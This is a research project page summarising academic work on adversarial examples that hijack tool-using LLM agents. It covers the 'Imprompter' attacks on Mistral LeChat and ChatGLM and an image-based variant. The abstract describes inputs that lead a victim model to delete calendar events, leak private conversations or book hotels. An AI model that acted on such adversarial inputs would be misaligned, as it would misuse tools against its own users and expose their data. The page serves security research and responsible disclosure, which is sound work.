Misusing Tools in Large Language Models With Adversarial Examples

Posted: Jun 2023 - Present
Abstract

LLMs are being enhanced with the ability to use tools and to process multiple modalities (and formulate agents). These new capabilities bring new benefits and also new security risks. In this thrust of work, we show a novel threat model where an attacker can use automatically generated adversarial examples to cause attacker-desired tool usage. For example, the attacker could cause a victim LLM to delete calendar events, leak private conversations and book hotels.

Misusing Tools in Large Language Models With Adversarial Examples

Imprompter, the latest work in this direction, is available at https://imprompter.ai and has been covered by WIRED here. In this work, we show real-world attacks on Mistral LeChat and ChatGLM. Mistral AI, has acknowledged our contribution and addressed this issue by disabling the markdown image rendering feature in LeChat. See changelog of Lechat on Sep 13 2024.

Image-based attack (as described in the abstract) paper, which is an older work, is available on arxiv with code at github.

Last Updated on Jun 1st 2025